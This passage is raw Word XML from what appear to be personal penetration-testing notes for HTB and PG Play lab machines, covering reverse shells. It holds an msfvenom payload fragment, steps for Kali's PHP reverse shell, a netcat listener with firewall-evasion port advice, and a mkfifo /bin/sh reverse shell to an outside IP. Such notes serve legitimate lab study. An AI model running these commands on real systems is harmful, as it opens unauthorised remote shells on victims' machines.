      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST=192.168.45.169 LPORT=9090 -f </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">raw </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; reverse.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1490"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId319">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Fired</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0F6F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F70">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F71">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cool tool to see different available reverse shells:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="909"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId320">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/mthbernardes/rsg</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F73">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F74">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F75">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Some reverse shells and webshells are already included in Kali by default:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Located in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/share/webshells</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Includes directories like php and perl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want the php rev shell, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp /usr/share/webshells/php/php-reverse-shell.php .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do this to edit the IP address and port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F7C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F7D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId321">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Reverse shell github cheatsheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F7E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="865"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your operating system matters. Some scripts will have a "cmd" argument and if you're on Linux, it should be "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then if you are on windows it should be "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd.exe</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F7F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F80">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remember to set up a listener as such (netcat):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1450"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> nc -lvnp 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1450"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Be sure to use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'sudo' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">when setting up your listener for ports under 1024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F83">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1450"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I REALLY RECOMMEND you use a common port for reverse shell that the target machine is already using, since it's less likely to be blocked. They sometimes block ports like 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1450"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap allows for arrow keys and tab complete and makes it so much better!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1450"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: USE rlwrap!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F86">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1450"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">l : Listening mode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1450"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">v : Verbose mode. Displays status messages in more detail.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1450"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">n : Numeric-only IP address. No hostname resolution. DNS is not being used.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1450"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">p : Port. Use to specify a particular port for listening</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F8A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F8B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F8C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Forcing /bin/bash or /bin/sh:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I must have gotten distracted and not finished this section, but I vaguely remember a command used to force /bin/bash instead of /bin/sh or vice versa. Probably from a PG Play box</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F8E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F8F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F90">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is a unique Netcat Reverse Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F91">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F92">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try this one if a regular Reverse Shell doesn't work!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F93">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one uses /bin/sh while the bash one uses /bin/bash. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If a bash one doesn't work, try using one that uses /bin/sh, like the one below or any other one</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. You can do "CTRL + F" on this website: </w:t>
      </w:r>
      <w:hyperlink r:id="rId322">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F94">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F95">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It has been used in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Celestial and Cronos HTB </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(and also used in the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId323">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Shakabrah</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play) At least for the Cronos, a normal Bash didn't work, while this one did</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -i 2&gt;&amp;1 | nc </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10 4444</w:t>
      </w:r>
